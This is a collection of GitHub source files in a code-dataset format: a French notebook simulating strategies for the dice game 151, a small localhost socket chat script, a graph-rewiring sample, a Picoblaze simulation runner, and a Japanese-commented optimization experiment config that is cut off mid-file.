audacieux\nauMoins250 = auMoinsX(250)\nauMoins300 = auMoinsX(300) # Compètement fou, très peu de chance de marquer ça ou plus!\nauMoins350 = auMoinsX(350)\nauMoins400 = auMoinsX(400)\nauMoins450 = auMoinsX(450)\nauMoins500 = auMoinsX(500)\nauMoins550 = auMoinsX(550)\nauMoins600 = auMoinsX(600)\nauMoins650 = auMoinsX(650)\nauMoins700 = auMoinsX(700)\n# On pourrait continuer ...\nauMoins800 = auMoinsX(800)\nauMoins850 = auMoinsX(850)\nauMoins900 = auMoinsX(900)\nauMoins950 = auMoinsX(950)\nauMoins1000 = auMoinsX(1000)\n\n\n# Une autre stratégie \"stupide\" : décider aléatoirement, selon une loi de Bernoulli, si elle continue ou si elle s'arrête.\n\n# In[17]:\n\n\ndef bernoulli(p=0.5):\n def joueur(compte, accu, t, total):\n \"\"\" Marque les points accumulés avec probabilité p = {} (Bernoulli).\"\"\".format(p)\n return rn.random() > p\n joueur.__name__ = \"bernoulli_{:.3g}\".format(p)\n return joueur\n\n\n# ----\n# #### 1.3.3. Quelques exemples\n# Essayons de faire jouer deux stratégies face à l'autre.\n\n# In[18]:\n\n\njoueurs = [unCoup, unCoup]\ntotal = 200\n\nunePartie(joueurs, total, True)\nunePartie(joueurs, total)\n\n\n# In[29]:\n\n\njoueurs = [unCoup, jusquauBout]\ntotal = 200\nunePartie(joueurs, total)\n\n\n# In[30]:\n\n\njoueurs = [unCoup, auMoins100]\ntotal = 500\nunePartie(joueurs, total)\n\n\n# In[31]:\n\n\njoueurs = [unCoup, auMoins200]\ntotal = 1000\nunePartie(joueurs, total)\n\n\n# ----\n# \n# #### 1.3.4. Générer plusieurs parties\n# On peut maintenant lancer plusieurs centaines de simulations de parties, sans afficher le déroulement de chaque parties.\n# La fonction `unePartie` renvoie un tuple, `(i, comptes)`, où :\n# - `i` est l'indice (0 ou 1) du joueur ayant gagné la partie,\n# - et `comptes` est une liste contenant les deux historiques des points des deux joueurs.\n\n# Par exemple, pour un `total = 500`, la sortie `(1, [[0, 100, 150, 250, 450], [0, 50, 450, 500]])` signifie :\n# - le joueur 1 a gagné, après avoir marqué 50 points, puis 400, et enfin 50,\n# - le joueur 2 a perdu, après avoir marqué 100 points, puis 50, puis 100, puis 200, mais a perdu avec 450 points.\n\n# In[57]:\n\n\ndef desParties(nb, joueurs, total=1000, i0=0):\n indices, historiques = [], []\n for _ in range(nb):\n i, h = unePartie(joueurs, total=total, i0=i0, debug=False)\n indices.append(i)\n historiques.append(h)\n return indices, historiques\n\n\n# Par exemple, on peut opposer le joueur pas courageux (`unCoup`) au joueur très gourmand (`jusquauBout`) sur 100 parties avec un total de 250 points :\n\n# In[33]:\n\n\ndef freqGain(indiceMoyen, i):\n # (1^i) + ((-1)**(i==0)) * indiceMoyen\n if i == 0:\n return 1 - indiceMoyen\n else:\n return indiceMoyen\n\n\n# In[56]:\n\n\ndef afficheResultatsDesParties(nb, joueurs, total, indices, historiques):\n indiceMoyen = np.mean(indices)\n pointsFinaux = [np.mean(list(historiques[k][i][-1] for k in range(nb))) for i in [0, 1]]\n\n print(\"Dans {} parties simulées, contre le total {} :\".format(nb, total))\n for i in [0, 1]:\n print(\" - le joueur {} ({.__name__:<11}) a gagné {:>5.2%} du temps, et a eu un score final moyen de {:>5g} points ...\".format(i, joueurs[i], freqGain(indiceMoyen, i), pointsFinaux[i]))\n\n\n# In[35]:\n\n\nnb = 10000\njoueurs = [unCoup, jusquauBout]\ntotal = 1000\nindices, historiques = desParties(nb, joueurs, total)\nafficheResultatsDesParties(nb, joueurs, total, indices, historiques)\n\n\n# In[36]:\n\n\nnb = 10000\njoueurs = [unCoup, jusquauBout]\ntotal = 500\nindices, historiques = desParties(nb, joueurs, total)\nafficheResultatsDesParties(nb, joueurs, total, indices, historiques)\n\n\n# In[37]:\n\n\nnb = 10000\njoueurs = [unCoup, jusquauBout]\ntotal = 5000\nindices, historiques = desParties(nb, joueurs, total)\nafficheResultatsDesParties(nb, joueurs, total, indices, historiques)\n\n\n# ----\n# Affichons une première courbe qui montrera la supériorité d'une stratégie face à la plus peureuse, en fonction du total.\n\n# In[99]:\n\n\ndef plotResultatsDesParties(nb, joueurs, totaux):\n N = len(totaux)\n indicesMoyens = []\n for total in totaux:\n indices, _ = desParties(nb, joueurs, total)\n indicesMoyens.append(np.mean(indices))\n plt.figure()\n plt.plot(totaux, indicesMoyens, 'ro')\n plt.xlabel(\"Objectif (points totaux à atteindre)\")\n plt.ylabel(\"Taux de victoire de 1 face à 0\")\n plt.title(\"Taux de victoire du joueur 1 ({.__name__}) face au joueur 0 ({.__name__}),\\n pour {} parties simulees pour chaque total.\".format(joueurs[1], joueurs[0], nb))\n plt.show()\n\n\n# In[100]:\n\n\nnb = 1000\njoueurs = [unCoup, jusquauBout]\ntotaux = [50, 100, 150, 200, 250, 300, 350, 400, 450, 500]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[101]:\n\n\nnb = 1000\njoueurs = [unCoup, jusquauBout]\ntotalMax = 2000\ntotaux = list(range(50, totalMax + 50, 50))\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# ----\n# D'autres comparaisons, entre stratégies gourmandes.\n\n# In[102]:\n\n\nnb = 5000\njoueurs = [auMoins100, auMoins200]\ntotalMax = 1000\ntotaux = list(range(50, totalMax + 50, 50))\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[103]:\n\n\nnb = 1000\njoueurs = [auMoins100, jusquauBout]\ntotalMax = 2000\ntotaux = list(range(50, totalMax + 50, 100))\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[104]:\n\n\nnb = 1000\ntotalMax = 2000\ntotaux = list(range(50, totalMax + 50, 50))\n\njoueurs = [unCoup, bernoulli(0.5)]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[105]:\n\n\njoueurs = [unCoup, bernoulli(0.1)]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[106]:\n\n\njoueurs = [unCoup, bernoulli(0.25)]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[107]:\n\n\njoueurs = [unCoup, bernoulli(0.75)]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[108]:\n\n\njoueurs = [unCoup, bernoulli(0.9)]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# ----\n# ## Évaluation en *self-play*\n# Plutôt que de faire jouer une stratégie face à une autre, et d'utiliser le *taux de victoire* comme une mesure de performance (ce que j'ai fait plus haut), on peut chercher à mesure un autre taux de victoire.\n# \n# On peut laisser une stratégie jouer tout seule, et mesurer plutôt le *nombre de coup requis pour gagner*.\n\n# In[19]:\n\n\ndef unePartieSeul(joueur, total=1000, debug=DEBUG):\n compte = 0\n nbCoups = 0\n nbLances = 0\n score = [0]\n if debug: print(\"Simulation pour le joueur ({.__name__}), le total à atteindre est {} :\".format(joueur, total))\n while compte < total: # Tant que joueur n'a pas gagné\n nbCoups += 1\n if debug: print(\" - Coup #{}, son compte est {} / {} ...\".format(nbCoups, compte, total))\n accu, nbLance = unJeu(joueur, compte, total, debug)\n nbLances += nbLance\n if accu > 0:\n compte += accu\n score.append(compte) # Historique\n if compte == total:\n if debug: print(\"- Le joueur ({.__name__}) a gagné en {} coups et {} lancés de dés !\".format(joueur, nbCoups, nbLances))\n return score\n\n\n# Testons ça avec la stratégie naïve `unCoup` :\n\n# In[55]:\n\n\nh = unePartieSeul(unCoup, 1000)\nprint(\"Partie gagnée en {} coups par le joueur ({.__name__}), avec le score {} ...\".format(len(h), unCoup, h))\n\n\n# ----\n# Comme précédemment, on peut générer plusieurs simulations pour la même tâche, et obtenir ainsi une liste d'historiques de jeu.\n\n# In[29]:\n\n\ndef desPartiesSeul(nb, joueur, total=1000, debug=False):\n historique = []\n for _ in range(nb):\n h = unePartieSeul(joueur, total=total, debug=debug)\n historique.append(h)\n return historique\n\n\n# In[60]:\n\n\ndesPartiesSeul(4, unCoup)\n\n\n# Ce qui nous intéresse est uniquement le nombre de coups qu'une certaine stratégie va devoir jouer avant de gagner :\n\n# In[116]:\n\n\n[len(l)-1 for l in desPartiesSeul(4, unCoup)]\n\n\n# Avec un joli affichage et un calcul du nombre moyen de coups :\n\n# In[117]:\n\n\ndef afficheResultatsDesPartiesSeul(nb, joueur, total, historique):\n nbCoupMoyens = np.mean([len(h) - 1 for h in historique])\n print(\"Dans {} parties simulées, contre le total {}, le joueur ({.__name__}) a gagné en moyenne en {} coups ...\".format(nb, total, joueur, nbCoupMoyens))\n\n\n# In[119]:\n\n\nhistorique = desPartiesSeul(100, unCoup, 1000)\nafficheResultatsDesPartiesSeul(100, unCoup, 1000, historique)\n\n\n# Comme précédemment, on peut afficher un graphique montrant l'évolution de ce nombre moyen de coups, disons pour $1000$ parties simulées, en fonction du total à atteindre.\n# La courbe obtenue devrait être croissante, mais difficile de prévoir davantage son comportement.\n\n# In[120]:\n\n\ndef plotResultatsDesPartiesSeul(nb, joueur, totaux):\n N = len(totaux)\n nbCoupMoyens = []\n for total in totaux:\n historique = desPartiesSeul(nb, joueur, total)\n nbCoupMoyens.append(np.mean([len(h) - 1 for h in historique]))\n plt.figure()\n plt.plot(totaux, nbCoupMoyens, 'ro')\n plt.xlabel(\"Objectif (points totaux à atteindre)\")\n plt.ylabel(\"Nombre moyen de coups joués avant de gagner\")\n plt.title(\"Nombre moyen de coups requis par {.__name__}\\n pour {} parties simulées pour chaque total.\".format(joueur, nb))\n plt.show()\n\n\n# ----\n# On va utiliser les mêmes paramètres de simulation que précédemment : $1000$ simulations pour chaque total, et des totaux allant de $50$ à $2000$ par pas de $50$.\n\n# In[121]:\n\n\nnb = 1000\ntotalMax = 2000\ntotaux = list(range(50, totalMax + 50, 50))\n\n\n# La courbe pour `unCoup` permet d'établir le comportement de la stratégie naïve, on pourra ensuite comparer les autres stratégies.\n\n# In[122]:\n\n\nplotResultatsDesPartiesSeul(nb, unCoup, totaux)\n\n\n# > Tient, pour `unCoup`, la courbe est linéaire dans le total. C'est assez logique, vue la stratégie utilisée !\n# > On marque à chaque coup, donc le nombre de coups moyens est juste le total divisé par le score moyen.\n# > On se rappelle que le score moyen en un tirage est d'environ $96$ points (avec suite), et en effet $2000 / 91 \\simeq 21$, ce qu'on lit sur la courbe.\n\n# In[123]:\n\n\nscoreMoyen = 96\ntotal = 2000\ntotal / scoreMoyen\n\n\n# ----\n# Pour `jusquauBout` :\n\n# In[124]:\n\n\nplotResultatsDesPartiesSeul(nb, jusquauBout, totaux)\n\n\n# > On constate que cette stratégie `jusquauBout` gagne bien plus rapidement que la stratégie `unCoup` !\n\n# ----\n# Pour `auMoins200`, par exemple :\n\n# In[125]:\n\n\nplotResultatsDesPartiesSeul(nb, auMoins200, totaux)\n\n\n# ----\n# Pour `bernoulli(0.5)`, par exemple :\n\n# In[126]:\n\n\nplotResultatsDesPartiesSeul(nb, bernoulli(0.5), totaux)\n\n\n# ----\n# Pour `bernoulli(0.2)`, par exemple :\n\n# In[127]:\n\n\nplotResultatsDesPartiesSeul(nb, bernoulli(0.2), totaux)\n\n\n# ----\n# Pour `bernoulli(0.8)`, par exemple :\n\n# In[128]:\n\n\nplotResultatsDesPartiesSeul(nb, bernoulli(0.8), totaux)\n\n\n# ----\n# Ces comparaisons de différentes stratégies de Bernoulli permettent de conclure, comme on le présentait, que la meilleure stratégie (parmi les quelques testées) est la stratégie `jusquauBout` !\n# \n# Toutes les courbes ci dessus montrent un comportement (presque) linéaire du nombre moyen de coups requis pour gagner en fonction du total.\n# \n# Ainsi, pour comparer différentes stratégies, on peut juste comparer leur nombre de coups moyen pour un certain total, disons $T = 2000$.\n\n# In[138]:\n\n\ndef comparerStrategies(joueurs, nb=1000, total=2000):\n resultats = []\n for joueur in joueurs:\n historique = desPartiesSeul(nb, joueur, total)\n nbCoupMoyen = np.mean([len(h) - 1 for h in historique])\n resultats.append((nbCoupMoyen, joueur.__name__))\n # Trier les résultats permet de voir les meilleures stratégies en premier !\n return sorted(resultats)\n\n\n# In[142]:\n\n\njoueurs = [unCoup, jusquauBout]\ncomparerStrategies(joueurs, nb=nb, total=totalMax)\n\n\n# On va comparer toutes les stratégies définies plus haut :\n\n# In[146]:\n\n\njoueurs = [unCoup, jusquauBout]\njoueurs += [auMoins50, auMoins100, auMoins150, auMoins200, auMoins250, auMoins300, auMoins350, auMoins400, auMoins450, auMoins500, auMoins550, auMoins600, auMoins650, auMoins700, auMoins800, auMoins850, auMoins900, auMoins950, auMoins1000]\nfor p in range(0, 20 + 1):\n joueurs.append(bernoulli(p/20.))\n\n# print([j.__name__ for j in joueurs])\n\n\n# In[148]:\n\n\nnb = 1000\ntotalMax = 2000\nresultats = comparerStrategies(joueurs, nb=nb, total=totalMax)\nprint(\"Pour le total {} et {} simulations ...\".format(totalMax, nb))\nfor (i, (n, j)) in enumerate(resultats):\n print(\"- La stratégie classée #{:2} / {} est {:<14}, avec un nombre moyen de coups = {:.3g} ...\".format(i, len(joueurs), j, n))\n\n\n# In[149]:\n\n\nnb = 2000\ntotalMax = 3000\nresultats = comparerStrategies(joueurs, nb=nb, total=totalMax)\nprint(\"Pour le total {} et {} simulations ...\".format(totalMax, nb))\nfor (i, (n, j)) in enumerate(resultats):\n print(\"- La stratégie classée #{:2} / {} est {:<14}, avec un nombre moyen de coups = {:.3g} ...\".format(i, len(joueurs), j, n))\n\n\n# In[150]:\n\n\nnb = 1000\ntotalMax = 5000\nresultats = comparerStrategies(joueurs, nb=nb, total=totalMax)\nprint(\"Pour le total {} et {} simulations ...\".format(totalMax, nb))\nfor (i, (n, j)) in enumerate(resultats):\n print(\"- La stratégie classée #{:2} / {} est {:<14}, avec un nombre moyen de coups = {:.3g} ...\".format(i, len(joueurs), j, n))\n\n\n# $\\implies$ la stratégie la plus efficace est en effet `jusquauBout` !\n\n# > Notons néanmoins que je n'ai testé que des stratégies très simples...\n# > En particulier, celles considérées n'utilisent pas, dans leur prise de décision, le nombre de coups déja joué, ni le nombre de tirage courant.\n","repo_name":"Naereen/notebooks","sub_path":"simus/Simulations_du_jeu_de_151.py","file_name":"Simulations_du_jeu_de_151.py","file_ext":"py","file_size_in_byte":26668,"program_lang":"python","lang":"fr","doc_type":"code","stars":118,"dataset":"github-code","pt":"53"} +{"seq_id":"71331623207","text":"import sys, socket, select\n\nip = \"127.0.0.1\"\nport = 8888\ntcp_listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntcp_listen_socket.bind((ip, port))\ntcp_listen_socket.listen(5)\n\ndef send_mess():\n while True:\n msg = input('message: ')\n tcp_client_socket.send(msg.encode())\n print(tcp_client_socket.recv(1025).decode())\n\n if msg == None or msg == '' or msg == 'bye':\n break\n msg = tcp_client_socket.recv(4096).decode()\n print(f'Server: {msg}')\n tcp_client_socket.send(\n bytes(\"sucesfuly reciver your messages\\n Typing....\", 'utf-8'))\n\n\nsend = send_mess()\n","repo_name":"Yabindradev/network","sub_path":"src/def.py","file_name":"def.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11656637562","text":"from greedy_rewiring import undirectedgraph\nfrom greedy_rewiring import greedy_rewiring as greedy\n\n# This sample illustrates how to use the greedy rewiring code. \n\nif __name__ == \"__main__\":\n adjacency_list = undirectedgraph.read_edge_list(\n 'random_regular_graph_mean8_N1000.txt')\n\n graph = undirectedgraph.UndirectedGraph(adjacency_list)\n rewired_graph = greedy.anyNodeAnyNeighborProbabilisticRewiring(graph, '1')\n rewired_graph.writeGraph('output.txt')\n","repo_name":"khandelwal/greedy-rewiring-network-generator","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27524893764","text":"#! /usr/bin/env python3\n\n\"\"\"\nrun_sim.py\n\nThis program is designed to run a Verilog simulation of the Picoblaze\nCPU on a Basys3 board.\n\"\"\"\n\nimport json\nimport os\nimport os.path\nimport shlex\nimport subprocess\nimport sys\nimport argparse\n\n\ndef which(program):\n \"\"\"\n Find the absolute path to specified program\n \"\"\"\n def is_exe(fpath):\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\n\n fpath, fname = os.path.split(program)\n if fpath:\n if is_exe(program):\n return program\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, program)\n if is_exe(exe_file):\n return exe_file\n\n return None\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Picoblaze Simulation')\n parser.add_argument(\"-D\", \"--debug\",\n help=\"Debug this script\",\n action=\"store_true\")\n parser.add_argument(\"--gui\",\n help=\"Run with GUI\",\n action=\"store_true\")\n parser.add_argument(\"--json_file\",\n default=\"simulate.json\",\n help=\"JSON configuration file\",\n action=\"store\")\n\n args = parser.parse_args()\n if args.debug:\n print (args)\n\n json_file = \"../configuration/\" + args.json_file\n print (os.path.isfile(json_file))\n try:\n f = open(json_file, \"r\")\n json_data = json.load(f)\n except:\n print(\"Failed to open %s\" % (json_file))\n sys.exit(-1)\n\n steps = sorted(json_data['flow_steps'].items())\n print (steps)\n for step in steps:\n print(\"\\n\\nRunning Step: %s \" % step[0])\n print(\"Executable: %s \" % json_data['flow'][step[1]]['executable'])\n print(\"Arguments: %s \" % json_data['flow'][step[1]]['arguments'])\n executable = json_data['flow'][step[1]]['executable']\n arguments = json_data['flow'][step[1]]['arguments']\n executable = which(executable)\n if arguments is None:\n command = executable\n else:\n command = executable + \" \" + str(arguments)\n\n if args.gui and 'gui' in json_data['flow'][step[1]]:\n command = command + json_data['flow'][step[1]]['gui']\n\n print(command)\n command = shlex.split(command)\n p = subprocess.Popen(command)\n p.wait()\n","repo_name":"ptracton/Picoblaze","sub_path":"tools/run_sim.py","file_name":"run_sim.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"38390075350","text":"from utility.constant import *\r\nimport utility.gloabl_values as g\r\n\r\n\"\"\" 重要な実験設定 \"\"\"\r\n# 最適化したい問題\r\nproblem_list = [NONCONSTRAINT, BOXCONSTRAINT, DISKCONSTRAINT]\r\nproblem_list = [DISKCONSTRAINT]\r\nproblem_list = [NONCONSTRAINT]\r\n# problem_list = [INEQUALITYCONSTRAINT]\r\n\r\n# データの形状\r\ndata_type_list = [SINX01MOUNT2, ROSENBROCK, ACKELY]\r\ndata_type_list = [XSQUARE, MOUNT2]\r\n# data_type_list = [ROSENBROCK]\r\n# data_type_list = [SINX01MOUNT2]\r\ndata_type_list = [SINX0MOUNT2]\r\n# data_type_list = [ACKELY]\r\ndata_type_list = [XSQUARE]\r\n# # data_type_list = [COMPLEX7]\r\n# data_type_list = [MOUNT2]\r\n# data_type_list = [SINX0]\r\n\r\n# 最適化手法\r\n# opt_list = [TRUSTREGION]\r\nopt_list = [MATHMATICALOPTIMIZATION, SIMULATEDANNEALING, FRANKWOLFE, SELECTBESTDATA]\r\n# opt_list = [SIMULATEDANNEALING, FRANKWOLFE, FRANKWOLFE2, SELECTBESTDATA]\r\n# opt_list = [FRANKWOLFE2, SELECTBESTDATA]\r\nopt_list = [FRANKWOLFE, SELECTBESTDATA]\r\nopt_list = [FRANKWOLFE]\r\n# opt_list = [SIMULATEDANNEALING]\r\n# opt_list = [FRANKWOLFE2]\r\n# opt_list = [MATHMATICALOPTIMIZATION]\r\n# opt_list = [SELECTBESTDATA]\r\n\r\n# 機械学習手法\r\nml_list = [POLYNOMIALREGRESSION, SVRGAUSS, LIGHTGBM, KNNLINEARREGRESSION]\r\n# ml_list = [POLYNOMIALREGRESSION, LIGHTGBM, ANNLINEARREGRESSION]\r\n# ml_list = [LIGHTGBM, WEIGHTEDLINEARREGRESSION]\r\n# ml_list = [LIGHTGBM]\r\n# ml_list = [SVRGAUSS]\r\n# # # ml_list = [SVRGAUSS, LIGHTGBM, ANNLINEARREGRESSION]\r\n# ml_list = [ANNLINEARREGRESSION]\r\n# ml_list = [KNNLINEARREGRESSION]\r\n# ml_list = [NEURALNETWORK, SVRGAUSS, LIGHTGBM, LINEARREGRESSION]\r\n# ml_list = [WEIGHTEDLINEARREGRESSION]\r\n# ml_list = [CGA2M]\r\n# ml_list = [LIGHTGBM, NEURALNETWORK]\r\n# ml_list = [POLYNOMIALREGRESSION]\r\n\r\n\r\n# シード\r\nseed_list = list(range(10))\r\nseed_list = list(range(5))\r\n# seed_list = [0]\r\n# seed_list = list(range(3))\r\n# seed_list = [4]\r\nval_list = list(range(1))\r\n\r\n\"\"\" 比較の為に変更するパラメータ \"\"\"\r\nn_item_list = list(range(1, 4))\r\nn_item_list = [1]\r\n# n_data_list = [2500, 5000, 7500, 10000, 12500, 15000, 17500, 20000]\r\nn_data_list = [200, 1000]\r\n# n_data_list = [1000]\r\n# n_data_list = [50]\r\n# n_data_list = [2500]\r\n# n_data_list = [100]\r\nn_feature_list = [1, 5, 10, 30]\r\n# n_feature_list = [1]\r\nn_feature_list = [5, 10, 15, 20, 25, 30, 35, 40, 45, 50]\r\n# n_feature_list = [5, 10, 15]\r\n# n_feature_list = [30, 50]\r\n# n_feature_list = [5]\r\n# n_feature_list = [10]\r\n# n_feature_list = [1]\r\nn_user_available_x_list = n_feature_list\r\n\r\nnoise_sigma_list = list(range(0, 5))\r\nnoise_sigma_list = [1, 2, 3]\r\nnoise_sigma_list = [5]\r\n# noise_sigma_list = [3]\r\n# noise_sigma_list = [3]\r\nn_nearest_list = list(range(10, 1010, 10))\r\n# n_nearest_list = [400]\r\n# n_nearest_list = list(range(10, 110, 10))\r\n# n_nearest_list = list(range(10, 310, 10))\r\n# n_nearest_list = [10, 20, 30]\r\n# noise_sigma_list = [2]\r\n# noise_sigma_list = [1]\r\n\r\n# n_item_list = list(range(1, 2))\r\n# n_data_list = [100, 500]\r\n# n_feature_list = [1, 2]\r\n# n_user_available_x_list = [1, 2]\r\n\r\n# weight_sigma_list = [0.1]\r\n\r\n\r\n\"\"\" 固定するパラメータ \"\"\"\r\nn_split = 5\r\ntrain_rate = 0.8\r\neval_rate = 0.2\r\nn_trial = 10\r\nn_val_data = 100\r\nn_feature_particle = 25\r\nn_max_iteration = 1000\r\nfinish_epsilon = 0.25\r\n\r\n\r\n\r\n\"\"\" 実験上の設定\"\"\"\r\nis_only_learning = False # 学習のみを行うか\r\nis_integrate_ml = False # 予測器を一つにまとめるか\r\nalready_optimize_ok = False # 最適化を再度行うか\r\nis_only_shape_check = False # 形状の出力のみを行うか\r\nsame_val_data_size = True # valデータを固定数生成するか\r\nsearch_hyper_paramerter = False # ハイパラ調整を行うか\r\nonly_user_available_x = True # ユーザの動かせる変数のみに絞るか\r\nonly_appropriate_feature = False # 無駄な特徴量の存在するパターンは排除するか\r\nrandom_initialize_x = False # ランダムに初期解を選ぶか.Falseなら最もデータ点が高い位置からスタート\r\nis_plot_proposed_method = False # 提案手法の特性についてプロットするか\r\nforce_minimize = True # 強制的に最小化問題に結果を置き換えるか\r\nuse_real_data = False # 現実データを使うか否か\r\nis_x_normal = True # xを正規分布に従って発生させるか\r\nvisualize_optimization_process_status = DONTSEE # 最適化途中の可視化\r\nauto_n_nearest = False\r\n\r\nis_taisu = False # 片対数グラフをプロットするか\r\nuse_errorbar = False # エラーバーにするか散布図にするか\r\n\r\n\r\n\r\n\"\"\"その他の設定\"\"\"\r\nalpha = 0.5\r\nmin_xs = -1 #0.\r\nmax_xs = 1 # 300.\r\nmin_xs = -5\r\nmax_xs = 5\r\nmin_xs = -10\r\nmax_xs = 10\r\n# min_xs = 0\r\n# max_xs = 10\r\nbase_th_distance = 1.5\r\ndelta = 0.1\r\n\r\nx_scale = 1\r\nn_nearest_best_rate = 0.4\r\n\r\n\r\n# # 実験1\r\n# zikken_id = 1\r\n# already_optimize_ok = True # 最適化を再度行うか\r\n# n_data_list = [1000]\r\n# n_feature_list = [10]\r\n# n_nearest_list = list(range(10, 1010, 10))\r\n# # n_nearest_list = [10]\r\n# auto_n_nearest = False\r\n# is_x_normal = False # xを正規分布に従って発生させるか\r\n# x_scale = 3\r\n# is_taisu = True\r\n# opt_list = [FRANKWOLFE2, SELECTBESTDATA]\r\n# opt_list = [FRANKWOLFE2]\r\n# data_type_list = [XSQUARE]\r\n# plot_name_dic[(solvers_names[FRANKWOLFE2], mlmodel_names[KNNLINEARREGRESSION])] = \"提案手法\"\r\n\r\n# 実験1.5\r\n# zikken_id = 2\r\n# already_optimize_ok = True # 最適化を再度行うか\r\n# n_data_list = [100, 500, 1000, 1500, 2000, 2500, 3000, 3500, 4000, 4500, 5000]\r\n# n_data_list = [100, 500, 1000, 1500, 2000, 2500]\r\n# # n_data_list = [2500]\r\n# n_feature_list = [10]\r\n# is_x_normal = False # xを正規分布に従って発生させるか\r\n# opt_list = [FRANKWOLFE, SIMULATEDANNEALING] # SELECTBESTDATA]\r\n# opt_list = [FRANKWOLFE2, SIMULATEDANNEALING, MATHMATICALOPTIMIZATION, SELECTBESTDATA]\r\n# # opt_list = [FRANKWOLFE]\r\n# opt_list = [FRANKWOLFE2]\r\n# # opt_list = [SIMULATEDANNEALING]\r\n# # opt_list = [MATHMATICALOPTIMIZATION]\r\n# # opt_list = [SELECTBESTDATA]\r\n# ml_list = [POLYNOMIALREGRESSION, LIGHTGBM, KNNLINEARREGRESSION]\r\n# # ml_list = [POLYNOMIALREGRESSION]\r\n# # ml_list = [LIGHTGBM, KNNLINEARREGRESSION]\r\n# data_type_list = [LOGX]\r\n# g.coef = 10\r\n# # data_type_list = [LOGX2]\r\n# min_xs = 0\r\n# max_xs = 10\r\n# problem_list = [INEQUALITYCONSTRAINT]\r\n# # n_nearest_list = list(range(10, 1010, 10))\r\n# n_nearest_best_rate = 0.1\r\n# auto_n_nearest = True\r\n# plot_name_dic[(solvers_names[FRANKWOLFE], mlmodel_names[KNNLINEARREGRESSION])] = \"提案手法(1000反復)\"\r\n# plot_name_dic[(solvers_names[FRANKWOLFE2], mlmodel_names[KNNLINEARREGRESSION])] = \"提案手法\"\r\n# color_dic[(solvers_names[FRANKWOLFE2], mlmodel_names[KNNLINEARREGRESSION])] = \"blue\"\r\n\r\n# #実験2\r\nzikken_id = 2\r\nalready_optimize_ok = False # 最適化を再度行うか\r\nn_data_list = [1000]\r\n# n_data_list = [200]\r\nn_nearest_best_rate = 0.12\r\nn_data_list = [500, 1000, 1500, 2000, 2500] #, 3000, 3500, 4000, 4500, 5000]\r\n# n_feature_list = [5, 10, 15, 20, 25, 30, 35, 40, 45, 50]\r\nn_feature_list = [10]\r\nn_feature_list = [50]\r\n# n_feature_list = [10, 20, 30, 40, 50]\r\nis_x_normal = False # xを正規分布に従って発生させるか\r\nx_scale = 3\r\n# problem_list = [INEQUALITYCONSTRAINT]\r\nml_list = [POLYNOMIALREGRESSION, LIGHTGBM, KNNLINEARREGRESSION]\r\nopt_list = [MATHMATICALOPTIMIZATION, SIMULATEDANNEALING, FRANKWOLFE2, SELECTBESTDATA]\r\n# opt_list = [FRANKWOLFE2, SELECTBESTDATA]\r\n# opt_list = [SELECTBESTDATA]\r\ndata_type_list = [SINX0MOUNT2]\r\n# data_type_list = [ACKELY]\r\ndata_type_list = [RASTRIGIN]\r\n# data_type_list = [ROSENBROCK]\r\n# data_type_list = [XSQUARE]\r\ndata_type_list = [GOLDSTEINPRICE]\r\n# data_type_list = [BOOTH]\r\n# data_type_list = [EASOM]\r\n# data_type_list = [BEALE]\r\ndata_type_list = [XSQUARE]\r\nauto_n_nearest = True\r\nplot_name_dic[(solvers_names[FRANKWOLFE2], mlmodel_names[KNNLINEARREGRESSION])] = \"提案手法\"\r\n\r\n\r\n#実験3\r\n# zikken_id = 3\r\n# min_xs = 0\r\n# max_xs = 300\r\n\r\n#Directory\r\nhome_dir = \"./\"\r\n# ml_dir = home_dir + \"machine_learning/\"\r\nif is_x_normal:\r\n result_dir = home_dir + f\"result/normalize/x_s{x_scale}/\"\r\nelse:\r\n result_dir = home_dir + \"result/uniform/\"\r\n\r\nprocess_dir = result_dir + \"process/\"\r\nml_model_dir = result_dir + \"machine_learning/\"\r\nsaved_model_dir = ml_model_dir + \"saved_model\"\r\nsaved_data_dir = result_dir + \"data\"\r\nml_shape_dir = ml_model_dir + \"shape\"\r\nml_info_dir = ml_model_dir + \"info\"\r\nopt_dir = result_dir + \"optimization\"\r\n\r\n\"\"\" ML手法 オート設定モード\"\"\"\r\nconstr_ml_for_opt = {SIMULATEDANNEALING: [NEURALNETWORK, LIGHTGBM], TRUSTREGION: [LIGHTGBM], FRANKWOLFE: [WEIGHTEDLINEARREGRESSION, ANNLINEARREGRESSION, KNNLINEARREGRESSION],\r\n MATHMATICALOPTIMIZATION: [LINEARREGRESSION, POLYNOMIALREGRESSION, SVRLINEAR, SVRPOLY, SVRGAUSS, CGA2M], STEPDISTANCE: [ANNLINEARREGRESSION],\r\n BAYESIANOPTIMIZATIONMU: [GAUSSIANPROCESSREGRESSION], BAYESIANOPTIMIZATIONLCB: [GAUSSIANPROCESSREGRESSION], SELECTBESTDATA: [KNNLINEARREGRESSION],\r\n FRANKWOLFE2: [KNNLINEARREGRESSION]}\r\n\r\n\"\"\" 問題+データタイプ オート設定モード\"\"\"\r\nconstr_problem_data_for_opt = {NONCONSTRAINT: [SINX0, SINX0MOUNT2, SINX01MOUNT2, COMPLEX7, ROSENBROCK, ACKELY, XSQUARE, MOUNT2, RASTRIGIN, LOGX, LOGX2, BOOTH, GOLDSTEINPRICE, EASOM, BEALE], \r\n BOXCONSTRAINT: [SINX0, SINX0MOUNT2, SINX01MOUNT2, 